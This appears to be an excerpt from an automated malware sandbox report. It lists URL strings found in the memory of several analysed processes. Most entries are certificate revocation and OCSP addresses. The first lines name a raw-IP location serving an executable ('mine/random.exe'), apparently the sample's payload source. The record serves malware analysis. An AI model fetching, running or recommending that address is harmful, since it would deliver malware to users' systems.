                              Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                              Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exei
                              Source: 2R0700.exe, 00000005.00000003.1208651372.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209620551.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7:80/mine/random.exerosoft
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                              Source: ADFoyxP.exe, 00000015.00000000.1524783358.0000000000408000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                              Source: Seat.com, 00000022.00000000.1614707823.0000000000E85000.00000002.00000001.01000000.0000001E.sdmp, Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp, TradeHub.com, 0000002B.00000000.1645400636.0000000000EC5000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.00000000094F2000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C1C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.000000000588D000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.00000000098BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
